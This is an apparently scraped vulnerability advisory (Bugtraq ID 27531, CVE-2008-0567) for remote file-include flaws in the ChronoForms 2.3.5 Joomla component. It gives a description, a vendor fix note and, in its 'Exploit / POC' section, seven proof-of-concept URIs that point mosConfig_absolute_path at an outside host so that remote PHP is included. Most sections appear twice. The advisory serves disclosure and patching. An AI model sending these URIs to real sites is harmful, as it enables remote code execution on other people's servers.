ChronoEngine ChronoForms mosConfig_Absolute_Path Multiple Remote File Include Vulnerabilities
BID:27531
Info
ChronoEngine ChronoForms mosConfig_Absolute_Path Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 27531 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-0567 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 30 2008 12:00AM |
| Updated: | May 07 2015 05:33PM |
| Credit: | Crackers_Child is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
ChronoEngine ChronoForms 2.3.5 |
| Not Vulnerable: | |
Discussion
ChronoEngine ChronoForms mosConfig_Absolute_Path Multiple Remote File Include Vulnerabilities
ChronoEngine ChronoForms component for Joomla! is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect ChronoForms 2.3.5; other versions may also be vulnerable.
ChronoEngine ChronoForms component for Joomla! is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect ChronoForms 2.3.5; other versions may also be vulnerable.
Exploit / POC
ChronoEngine ChronoForms mosConfig_Absolute_Path Multiple Remote File Include Vulnerabilities
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/[path]/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http;//www.example2.com
http://www.example.com/[path]/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http;//www.example2.com
http://www.example.com/[path]/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http;//www.example2.com
http://www.example.com/[path]/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http;//www.example2.com
http://www.example.com/[path]/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http;//www.example2.com
http://www.example.com/[path]/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http;//www.example2.com
http://www.example.com/[path]/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http;//www.example2.com
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/[path]/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http;//www.example2.com
http://www.example.com/[path]/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http;//www.example2.com
http://www.example.com/[path]/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http;//www.example2.com
http://www.example.com/[path]/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http;//www.example2.com
http://www.example.com/[path]/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http;//www.example2.com
http://www.example.com/[path]/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http;//www.example2.com
http://www.example.com/[path]/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http;//www.example2.com
Solution / Fix
ChronoEngine ChronoForms mosConfig_Absolute_Path Multiple Remote File Include Vulnerabilities
Solution:
Reportedly, the vendor has released ChronoForms 2.3.7 to address these issues, but Symantec has not verified this. Please see the references and contact the vendor for more information.
Solution:
Reportedly, the vendor has released ChronoForms 2.3.7 to address these issues, but Symantec has not verified this. Please see the references and contact the vendor for more information.
References
ChronoEngine ChronoForms mosConfig_Absolute_Path Multiple Remote File Include Vulnerabilities
References:
References:
- ChronoForms Homepage (ChronoEngine)